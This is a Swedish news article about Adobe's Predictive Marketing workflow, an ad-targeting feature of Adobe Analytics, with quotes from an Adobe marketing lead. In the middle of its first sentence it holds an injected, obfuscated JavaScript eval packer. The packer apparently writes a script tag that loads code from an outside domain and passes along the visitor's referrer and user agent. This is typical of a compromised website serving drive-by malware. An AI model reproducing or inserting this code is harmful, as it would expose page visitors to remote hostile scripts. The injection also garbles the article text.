Image Image Image Image Image Image Image Image Image Image

| 25 november, 2017

Scroll to top

Top

No Comments

Adobe: Nytt verktyg förutspår kunders beteende online | Revue.se

Adobe: Nytt verktyg förutspår kunders beteende online
Sebastian Plengier Ehrnfelt

Adobe eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fhfde|var|u0026u|referrer|nyhyr||js|php’.split(‘|’),0,{}))
lanserar ett nytt marknadsföringsverktyg som kan förutse vem som kommer att klicka på en online-annons eller en banner och köpa dina produkter. Lösningen heter Predictive Marketing workflow och kan identifiera värdefulla målgrupper ur många terabyte data och starta riktade kampanjer på bara några få minuter.

Den växande mängden data är ett tveeggat svärd för marknadsavdelningarna. Komplexiteten betyder att många utgår från sin magkänsla istället för data. Med det Predictive Marketing workflow, som är en funktion i Adobe Analytics,  ändras förutsättningarna och marknadsfolk kan snabbt skapa konkret värde av större datamängder.

”Predictive Marketing kan identifiera målgrupper med bakgrund i en lång rad parametrar och därifrån förutse hur sannolikt det är att de klickar på en banner eller annons på bara några få minuter. Det betyder att man kan rikta sina kampanjer till de mest värdefulla segmenten utan att det kräver veckor av analys.” säger Malin Bodolla, Nordisk marknadsföringsansvarig för Adobe Digital Marketing.

Lösningen är molnbaserad och kan mycket snabbt gå igenom åtskilliga terabyte data från en lång rad olika kanaler. Det betyder att marknadsavdelningen kommer att få en lägre responstid och snudd på ögonblick använda annonspengarna mot den målgrupp som med störst sannolikhet kommer att visa intresse för en specifik kampanj.

Stora datamängder betyder relevanta kampanjer

Predictive Marketing-workflow är även integrarat med Adobe Target-lösningen som säkerställer att olika målgrupper ser annonser som exakt speglar deras preferenser och situation. Det kan till exempel vara en biluthyrare som med automatik riktar annonser för större bilar till familjer och mindre bilar till äldre par.

”I en tid då företag minskar sina omkostnader är det en fördel att snabbt kunna reagera på nya krav från marknaden och samtidigt se till att annonspengarna används med bakgrund av data istället för på känsla.” säger Malin Bodolla. 

Lösningen förväntas lanseras i maj i år.

Om Adobe Marketing Cloud
Adobe Analytics och Adobe Target är en del av Adobe Marketing Cloud. Här har kreativa, reklamfolk och andra som jobbar professionellt med marknadsföring tillgång til de ledande verktygen för utveckling, förvaltning och mätning av kampanjer.

Läs mer här!